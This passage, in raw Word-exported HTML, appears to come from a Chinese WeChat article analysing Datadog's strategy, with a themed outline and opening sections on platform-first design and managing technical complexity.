  宋体;color:blue;mso-font-kerning:0pt;">1.3 </span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">数据整合，哪里还有孤岛</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">        -  </span><span lang="EN-US"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">只要你足够好，你就能代<span lang="EN-US">表</span></span></span><span lang="X-NONE" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:
  X-NONE;">”</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:
  X-NONE;"><span lang="EN-US">单一真相源</span></span><span lang="X-NONE" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;">“</span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">        -  </span><span lang="EN-US"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">平台优先其实是最优策略</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US"><span style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
  宋体;color:blue;mso-font-kerning:0pt;">1.4 </span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">产品互联，我就是你的生态</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">        -  </span><span lang="EN-US"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">有好平台，才能精益和敏捷</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">        -  </span><span lang="EN-US"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">客户越来越倾向可以互相协作的产品</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US"><span style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
  宋体;color:blue;mso-font-kerning:0pt;">1.5 </span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">数据是</span></span><span style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:blue;mso-font-kerning:0pt;">AI</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">的最终优势</span></span></span><span lang="EN-US" style="font-size:
  11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">        -  </span><span lang="EN-US"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">干净的数据是</span></span><span style="font-size:11.0pt;font-family:
  &#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:blue;mso-font-kerning:
  0pt;">AI</span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:
  X-NONE;"><span lang="EN-US">的最终优势</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">        -  </span><span lang="EN-US"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">如何打赢与复杂性的竞赛？</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;"> <o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size: 18px;"><strong><span lang="EN-US" style="font-size: 18px;font-family: 微软雅黑, sans-serif;color: blue;">- 主题2：解决一线用户的问题优先</span></strong></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US"><span style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
  宋体;color:blue;mso-font-kerning:0pt;">2.1 </span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">从一线用户问题出发，妥妥的群众路线</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">        -  </span><span lang="EN-US"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">从问题出发构建解决方案</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">        -  </span><span lang="EN-US"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">通过解决问题来驱动产品演进</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US"><span style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
  宋体;color:blue;mso-font-kerning:0pt;">2.2 </span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">反微笑曲线的发展策略</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US"><span style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
  宋体;color:blue;mso-font-kerning:0pt;">2.3 </span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">智能化运营，帮你圆梦</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US"><span style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
  宋体;color:blue;mso-font-kerning:0pt;">2.4 </span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">数字化转型，对抗睁眼瞎</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US"><span style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
  宋体;color:blue;mso-font-kerning:0pt;">2.5 </span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">谁的钱我都要赚</span></span></span><span lang="EN-US" style="font-size:
  11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;"> <o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size: 18px;"><strong><span lang="EN-US" style="font-size: 18px;font-family: 微软雅黑, sans-serif;color: blue;">- 主题3：融合可观测性和安全</span></strong></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US"><span style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
  宋体;color:blue;mso-font-kerning:0pt;">3.1 </span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">背景：割裂的<span lang="EN-US">开发、运营和安全</span></span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US"><span style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
  宋体;color:blue;mso-font-kerning:0pt;">3.2 </span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">用可观测性的筷子，夹住了安全的菜</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US"><span style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
  宋体;color:blue;mso-font-kerning:0pt;">3.3 </span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">为什么能夹安全的菜？</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US"><span style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
  宋体;color:blue;mso-font-kerning:0pt;">3.4 </span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">为什么敢夹安全的菜</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;"> <o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span style="font-size: 18px;"><strong><span lang="EN-US" style="font-family: Calibri, sans-serif;">- </span><span lang="EN-US" style="font-family: 微软雅黑, sans-serif;color: blue;">主题</span><span style="font-family: Calibri, sans-serif;color: blue;">4 </span><span lang="EN-US" style="font-family: 微软雅黑, sans-serif;color: blue;">差异化的市场策略</span></strong></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US"><span style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
  宋体;color:blue;mso-font-kerning:0pt;">4.1 </span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">狗大户不用参会！</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US"><span style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
  宋体;color:blue;mso-font-kerning:0pt;">4.2 </span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">您别自我陶醉，我让会计来算算成本！</span></span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:
  0pt;"><o:p></o:p></span></p><p style="text-align:left;mso-pagination:widow-orphan;"><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;mso-font-kerning:0pt;">    - </span><span lang="EN-US"><span style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
  宋体;color:blue;mso-font-kerning:0pt;">4.3 </span><span lang="EN-US" style="font-size:11.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
  宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;"><span lang="EN-US">满手好牌，赚个盆满钵满</span></span><span lang="X-NONE" style="font-size:11.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:blue;mso-font-kerning:0pt;mso-ansi-language:X-NONE;">……</span></span><span lang="EN-US" style="font-size:11.0pt;font-family:宋体;mso-bidi-font-family:宋体;mso-font-kerning:0pt;"><o:p></o:p></span></p></td></tr></tbody></table><p><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#1E4E79;mso-font-kerning:18.0pt;">主题</span></strong><strong><span lang="EN-US" style="font-size:16.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#1E4E79;mso-font-kerning:18.0pt;">1</span></strong><strong><span style="font-size:16.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:#1E4E79;mso-font-kerning:18.0pt;">：技术平台优先</span></strong><strong><span lang="EN-US" style="font-size:16.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#1E4E79;mso-font-kerning:18.0pt;"><o:p></o:p></span></strong></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:#2E75B5;mso-font-kerning:
0pt;">1.1 </span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#2E75B5;mso-font-kerning:0pt;">宏观叙事背景：技术变革与复杂性</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#2E75B5;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p><strong><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#5B9BD5;mso-font-kerning:0pt;">技术创新</span></strong><strong><span style="font-size:12.0pt;font-family:宋体;mso-bidi-font-family:Calibri;color:#5B9BD5;mso-font-kerning:0pt;">→</span></strong><strong><span style="font-size:12.0pt;font-family:
&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#5B9BD5;mso-font-kerning:
0pt;">复杂性的爆炸式增长</span></strong><strong><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:#5B9BD5;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">&#34;</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">当你倾向于技术创新时，你就面临着复杂性的爆炸式增长。<span lang="EN-US">&#34;<o:p></o:p></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000723" data-ratio="0.5671641791044776" data-s="300,640" data-type="png" data-w="1005" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=179967b2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUDvRMWicjQZznjLXx9KDqlMvlsxJlh1cQFNmQMzmAb3tAWBZ8pUQib9yfw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">数字化转型是必要的，因为它能带来更好的商业成果。数字化转型的技术创新，导致技术复杂性的指数级增长，包括技术数量、计算单元、软件变更频率和参与人员的爆炸式增长。<span lang="EN-US"><o:p></o:p></span></span></p><p><strong><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#3C87CD;mso-font-kerning:0pt;">理解基础设施和应用程序的变化方式<span lang="EN-US"><o:p></o:p></span></span></strong></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">“<span lang="EN-US">we understand the
way infrastructure and applications are changing. We also connect separate
teams to each other across functions.</span>”<span lang="EN-US"><o:p></o:p></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000724" data-ratio="0.5577299412915852" data-s="300,640" data-type="png" data-w="1022" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=b32896f2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUD7ZKSxooCRdlBqkB8Y9rTGzGorS4B0iadG6IUE3tjJicbWJMY1crnFiccg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">Datadog</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">公司的存在就是为了解决客户面临的这种巨大的复杂性问题，通过连接所有软件组件、扩展基础设施和服务，并理解基础设施和应用程序的变化方式来应对这一挑战。<span lang="EN-US"><o:p></o:p></span></span></p><p><strong><span lang="EN-US" style="font-size:14.0pt;font-family:
&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:宋体;color:#2E75B5;mso-font-kerning:
0pt;">1.2 </span></strong><strong><span style="font-size:14.0pt;font-family:&#34;微软雅黑&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#2E75B5;mso-font-kerning:0pt;">统一实时数据平台奠定基业</span></strong><strong><span lang="EN-US" style="font-size:14.0pt;font-family:&#34;Calibri&#34;,sans-serif;mso-fareast-font-family:
宋体;color:#2E75B5;mso-font-kerning:0pt;"><o:p></o:p></span></strong></p><p><strong><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#3C87CD;mso-font-kerning:0pt;">产品哲学是：平台先行，易用深涵<span lang="EN-US"><o:p></o:p></span></span></strong></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">&#34;</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">简单，但不简陋<span lang="EN-US">&#34;</span>（原文：<span lang="EN-US">&#34;Simple, but not simplistic&#34;</span>）<span lang="EN-US"><o:p></o:p></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000725" data-ratio="0.5159045725646123" data-s="300,640" data-type="png" data-w="1006" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=2a1a8fe0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUDTY8ElmNUbhPg3p7q0tia1GyQicKV8d22SujokwYibphINoONamF3tvWXA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">Datadog</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">的产品成功基于两个核心理念：首先，从一开始就构建一个开放、统一的平台，所有产品在架构、数据和用户界面层面深度集成，支持跨数据集、跨产品和跨团队的端到端用例。<span lang="EN-US"><o:p></o:p></span></span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">其次，专注于开发易于采用的产品，做到简单但不简陋。产品应该能在几分钟内部署，无需繁琐的培训，能快速显示价值，如同电子表格一样易用。<span lang="EN-US"><o:p></o:p></span></span></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">同时，用户可以无限制地定制和扩展功能。这种方法使<span lang="EN-US">Datadog</span>能够被广泛部署和使用，覆盖各种基础设施和应用组件，服务于从开发者到高管的各类用户，最终打破团队间的壁垒。<span lang="EN-US"><o:p></o:p></span></span></p><p><strong><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:#3C87CD;mso-font-kerning:0pt;">平台先于产品，艰难而正确的选择<span lang="EN-US"><o:p></o:p></span></span></strong></p><p><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
Calibri;color:black;mso-font-kerning:0pt;">“构建广泛的平台作为基础，而不是专注于单一产品；在平台基础上开发多样化的用例和产品；长远眼光可能带来更大的市场成功”<span lang="EN-US"><o:p></o:p></span></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000726" data-ratio="0.558974358974359" data-s="300,640" data-type="png" data-w="975" style="height: auto !important;" src="https://wechat2rss.xlab.app/img-proxy/?k=4748f2b7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FFStUibflSINzwRspYThAL7Gja0xzkiaUUD6RUhZDGFX44QkeuYqpFicxGAVibdrGN2UZvvfnQVS07b8ZdcFCJvib1Yg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span lang="EN-US" style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:Calibri;color:black;mso-font-kerning:0pt;">Datadog</span><span style="font-size:12.0pt;font-family:&#34;微软雅黑 Light&#34;,sans-serif;mso-bidi-font-family:
